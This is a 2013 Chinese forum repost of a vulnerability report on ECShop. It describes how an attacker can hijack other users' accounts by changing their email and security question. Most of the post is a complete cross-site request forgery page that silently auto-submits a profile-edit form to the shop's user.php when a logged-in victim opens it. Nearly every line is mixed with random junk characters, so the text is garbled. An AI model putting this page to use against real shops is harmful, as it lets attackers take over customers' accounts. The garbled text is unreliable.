找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1983|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:4 A! c6 \; Q2 Q4 K% m" _
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
2 _/ w$ Y! a3 K+ K: Z8 q+ M# @; W" S3 v9 e
Demo For:http://www.wooyun.org/bug.php?action=view&id=3952 }! G- l% V$ B& K( i
  u  r  k3 R2 q8 C/ }: N
详细说明:) W$ y) {- e. b
利用csrf和xss可以突破官方所说的“障碍”4 h% d( i& B- S: [" n& w6 b( Q
xss版本已经有人说明" q2 f5 |0 B  e+ f9 v" O
这里给出csrf版本% z- O& f" s, l
# ]; D. y/ t8 `6 A
漏洞证明:% E2 d" X+ S& ?8 M* q" b) ~
<html>
* j! i- I: _6 F' X: ~+ ]8 m  x<body>3 K4 O0 T) Y/ m
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
' {* V# j2 S4 ~& i' q  k<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
+ V, q9 n/ B  M6 v+ r- V<INPUT TYPE="text" NAME="act" value="act_edit_profile">
1 \# V' }( Z* Z& t! @+ O; P<INPUT TYPE="text" NAME="sel_question" value="ecshop">; ^1 e7 ^+ ~0 |3 j2 ^) Z% ~
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">/ R) E/ F+ J3 y9 t1 T. `$ V( Q
</body>
% P% `; h9 d- W<script>
) f% B! p8 f7 f9 g' Gdocument.forms[0].submit();
% t: @7 p% i5 t5 Q</script>; f" ^! r! G7 ^! v
</html>0 \$ i7 t! V0 p3 w2 D, ^$ L! M
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失; J, p/ L: g, {& r0 e; o1 V
3 D! I+ C' \, F7 n9 M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表